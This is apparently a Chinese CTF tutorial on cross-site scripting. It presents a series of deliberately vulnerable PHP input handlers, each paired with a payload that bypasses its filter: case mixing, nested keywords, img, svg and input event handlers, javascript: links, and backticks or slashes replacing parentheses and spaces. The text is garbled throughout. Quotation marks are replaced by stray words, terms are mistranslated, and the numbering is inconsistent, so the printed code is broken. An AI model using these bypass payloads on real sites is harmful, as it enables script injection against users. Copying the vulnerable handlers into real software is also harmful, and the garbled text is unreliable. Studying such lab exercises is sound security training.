php括号过滤技巧_CTF实战一路来学XSSXSS跨站脚本马脚复现姿势以及各类绕过方法

文章目录 [+]

试玩链接：http://tr.secevery.com/xss_platform/code/xss01/index.php?name=1

0x01 经典一（未过滤）

一、代码片段

php括号过滤技巧_CTF实战一路来学XSSXSS跨站脚本马脚复现姿势以及各类绕过方法

<?php ini_set('display_errors', 0); if (isset($_GET['name'])) { $str = $_GET['name']; echo \"大众<h2 class='b4684c31af8f303a main'>你好：\公众.$str.'</h2>'; } else { echo \公众<h2 class='4c31af8f303a5a6f main'>Please add parameters name.</h2>\"大众; } ?>

（图片来自网络侵删）

二、剖析通过GET通报进来的name未做过滤，直接输入，因此引发XSS三、布局payloadname=<script>alert(1)</script>

0x01 经典二（大小写绕过）一、代码片段<?phpini_set(\公众display_errors\"大众, 0);$str = @$_POST[\"大众keyword\"大众];$str = str_replace('script', '', $str);echo '<form class=\公众main\"大众 action=\"大众index.php\"大众 method=\"大众POST\"大众><input name=keyword size=60 value=\公众'.$str.'\"大众><input type=submit name=submit value=\"大众Search\"大众/></form>';echo '<p class=\"大众main\公众>No results for \公众<b>'.htmlspecialchars($str).'</b>\"大众</p>';?> 二、剖析通过post通报进来的keyword进行了关键词过滤，因此通过大小写可以绕过(也可其他姿势，此处紧张讲解大小写绕过) 三、布局payload0x02 经典三（img标签绕过）一、代码片段<?phpini_set(\"大众display_errors\公众, 0);$str = strtolower(@$_POST[\"大众keyword\"大众]);$str = str_replace('script', '', $str);echo '<form class=\"大众main\公众 action=\"大众index.php\"大众 method=\"大众POST\"大众><input name=keyword size=60 value=\公众'.$str.'\"大众><input type=submit name=submit value=\公众Search\公众/></form>';echo '<p class=\"大众main\公众>No results for \公众<b>'.htmlspecialchars($str).'</b>\公众</p>';?> 二、剖析此处不仅大小写过滤，而且更换了script关键词为空，<script>标签不能用可利用其他标签绕过三、布局payloadkeyword=\"大众><img src=# onerror=\"大众alert(1)\"大众><\"大众0x03 经典四（二次绕过）一、代码片段<?$xss=$_GET['x'];$xss=preg_replace(\"大众/script/i\"大众,\公众\"大众,$xss);echo 'hello:',$xss;?> 二、剖析get通报过来的参数大小写都过滤了，此处只更换一次关键词，由于可以利用script关键词两次从而达到绕过。
(此处有其他姿势，但紧张讲解二次绕过姿势)三、布局payloadx=<SCRscriptIPT>alert(1)</SCscriptRIPT>0x04 经典五（A标签合营javascript绕过）一、代码片段<?phpini_set(\"大众display_errors\"大众, 0);$str = strtolower(@$_POST[\公众keyword\公众]);while (strpos($str,'<script>')) {$str = str_replace('<script>', '', $str);}while (strpos($str,'on')) {$str = str_replace('on', '', $str);}echo '<form class=\"大众main\"大众 action=\"大众index.php\"大众 method=\"大众POST\公众><input name=keyword size=60 value=\公众'.$str.'\"大众><input type=submit name=submit value=\公众Search\公众/></form>';echo '<p class=\公众main\"大众>No results for \"大众<b>'.htmlspecialchars($str).'</b>\公众</p>';?>

二、剖析post通报过来的参数，进行了关键标签过来，并且调用事宜的on关键词也过滤掉。
此处可调用a标签，通过点击a标签重定引导致XSS三、布局payloadkeyword=\公众><a href=javascript:alert(1)>xss me</a><\"大众

0x05 经典六（SVG标签绕过）1、代码片段<?php ini_set(\"大众display_errors\"大众, 0); $str = strtolower(@$_POST[\"大众keyword\"大众]); while (strpos($str,'script')) {$str = str_replace('script', '', $str);} while (strpos($str,'<img')) {$str = str_replace('<img', '', $str);} while (strpos($str,'<a')) {$str = str_replace('<a', '', $str);} echo ' <form class=\"大众main\"大众 action=\公众index.php\公众 method=\公众POST\"大众> <input name=keyword size=60 value=\公众'.$str.'\"大众> <input type=submit name=submit value=\"大众Search\"大众/> </form>'; echo '<p class=\"大众main\公众>No results for \"大众<b>'.htmlspecialchars($str).'</b>\"大众</p>'; ?>

二、剖析post通报过来的参数，进行了关键标签过滤，但是仔细创造没有过滤svg标签三、布局payloadkeyword=\"大众><svg src=x onclick=alert(1)></svg><\"大众

点击之后弹框0x06 经典五（括号过滤猥琐绕过）一、代码片段<?php ini_set(\"大众display_errors\"大众, 0); $str = strtolower(@$_POST[\"大众keyword\"大众]); while (strpos($str,'script')) {$str = str_replace('script', '', $str);} $str = str_replace('(', '', $str); $str = str_replace(')', '', $str); echo ' <form class=\"大众main\"大众 action=\"大众index.php\公众 method=\"大众POST\公众> <input name=keyword size=60 value=\"大众'.$str.'\公众> <input type=submit name=submit value=\"大众Search\公众/> </form>'; echo '<p class=\公众main\"大众>No results for \"大众<b>'.htmlspecialchars($str).'</b>\"大众</p>'; ?

二、剖析post通报过来的参数，进行了关键标签过滤，但是仔细创造没有过滤svg标签，但是奇葩的过滤了括号，但是可用反引号替代三、布局payloadkeyword=\"大众><svg src=x onclick=alert`1`></svg><\"大众0x07 经典六（空格注释绕过）一、代码片段<?php ini_set(\"大众display_errors\"大众, 0); $str = strtolower(@$_POST[\"大众keyword\公众]); while (strpos($str,'script')) {$str = str_replace('script', '', $str);} $str = str_replace('(', '', $str); $str = str_replace(')', '', $str); $str = str_replace(' ', '', $str); echo ' <form class=\公众main\"大众 action=\"大众index.php\"大众 method=\"大众POST\公众> <input name=keyword size=60 value=\"大众'.$str.'\"大众> <input type=submit name=submit value=\"大众Search\"大众/> </form>'; echo '<p class=\"大众main\"大众>No results for \"大众<b>'.htmlspecialchars($str).'</b>\公众</p>'; ?>

二、剖析post通报过来的参数，进行了关键标签过滤，并且过滤()，乃至还TM的过滤了空格，切实其实丧心病狂三、布局payloadkeyword=\"大众><img// src=\"大众x//\"大众onclick=alert`1`><\"大众keyword=\"大众><img/src='1'/onerror=alert`0`><\"大众keyword=\"大众><<svg/onload=alert`1`><\"大众

0x08 经典七（input标签里绕过）一、代码片段<?php ini_set(\公众display_errors\"大众, 0); $str = strtolower(@$_POST[\"大众keyword\"大众]); $str = preg_replace(\公众/<.?>/\公众, '', $str); echo ' <form class=\"大众main\公众 action=\"大众index.php\"大众 method=\"大众POST\公众> <input name=keyword size=60 value=\公众'.$str.'\"大众> <input type=submit name=submit value=\"大众Search\公众/> </form>'; echo '<p class=\"大众main\"大众>No results for \公众<b>'.htmlspecialchars($str).'</b>\公众</p>'; ?>

二、剖析post通报过来的参数，进行正则匹配过滤，过滤所有标签3、布局payload<input type=image src=x onerror=alert(1)> 这个payload会把input当做img标签来用此处用 \"大众 type=image src=x onerror=alert(1) \公众闭合前后双引号，布局即可keyword=\"大众 type=image src=x onerror=alert(1) \公众

0x08 经典八（输出直接在可实行JS代码里面）一、代码片段<?php ini_set(\公众display_errors\公众, 0); echo ' <form class=\"大众main\公众 action=index.php method=POST> <input name=link size=60 value=\"大众\"大众> <input type=submit name=submit value=\公众add link\"大众 /> </form>'; echo '<div class=\"大众link\"大众></div>'; if (isset($_POST['link'])) { $str = strtolower(@$_POST[\公众link\"大众]); $str=str_replace('\"大众','"',$str); $str=str_replace(\公众'\公众,''',$str); echo '<div class=\"大众main\公众><a href=\"大众'.$str.'\"大众>Link</a></div>'; } ?>

二、剖析本实例post通报过来的参数，输出在a标签里面，直接调用js代码可弹框三、布局payloadlink=javascript:alert(1)